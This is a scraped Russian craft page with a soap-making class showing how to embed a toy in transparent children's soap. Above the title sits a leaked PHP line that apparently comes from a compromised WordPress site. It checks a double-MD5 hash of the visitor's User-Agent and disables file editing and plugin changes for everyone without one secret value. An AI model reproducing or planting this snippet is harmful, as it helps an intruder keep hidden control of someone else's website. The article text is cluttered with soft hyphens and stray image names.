if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Мастер-класс как сделать детское мыло своими руками | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Мастер-класс как сделать детское мыло своими руками

Это мастер-класс как сделать из прозрачной мыльной основы очень интересное детское мыло с игрушкой внутри. Малышам оно точно понравится!

Это мастер-класс как сде­лать из про­зрач­ной мыль­ной осно­вы очень инте­рес­ное дет­ское мыло с игруш­кой внут­ри. Малы­шам оно точ­но понра­вит­ся! Они будут с нетер­пе­ни­ем ждать, когда же мыль­це нако­нец смы­лит­ся, и игруш­ку мож­но будет достать.

  1. Рас­то­пи­те 20–30 грамм мыль­ной осно­вы и вылей­те ее в форму.
  2. Обя­за­тель­но брыз­ни­те спир­том, что­бы не оста­лось пузырьков.pervyi-sloi
  3. Когда этот слой засты­нет, еще раз хоро­шо побрыз­гай­те его спир­том. Пшик­ни­те так­же и на фигур­ку. Рас­то­пи­те еще при­мер­но 40 грамм осно­вы, залей­те фор­му до сере­ди­ны и осто­рож­но опу­сти­те в нее игруш­ку. Не забудь­те опять уда­лить пузырьки!vtoroi-sloi
  4. Дожди­тесь засты­ва­ния этой части и еще раз повто­ри­те дей­ствия пунк­та 3: залей­те сле­ду­ю­щий слой до кра­ев фор­мы и опу­сти­те в него фигурку.

Оста­лось подо­ждать пол­но­го засты­ва­ния, и ваше дет­ское мыло, сде­лан­ное сво­и­ми рука­ми, готово!


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Алина

Уже давно начала увлекаться мыловарением и вот решила поделиться своими знаниями с новичками. Будут вопросы как приготовить мыло - задавайте, обязательно отвечу! Читайте все мои записи!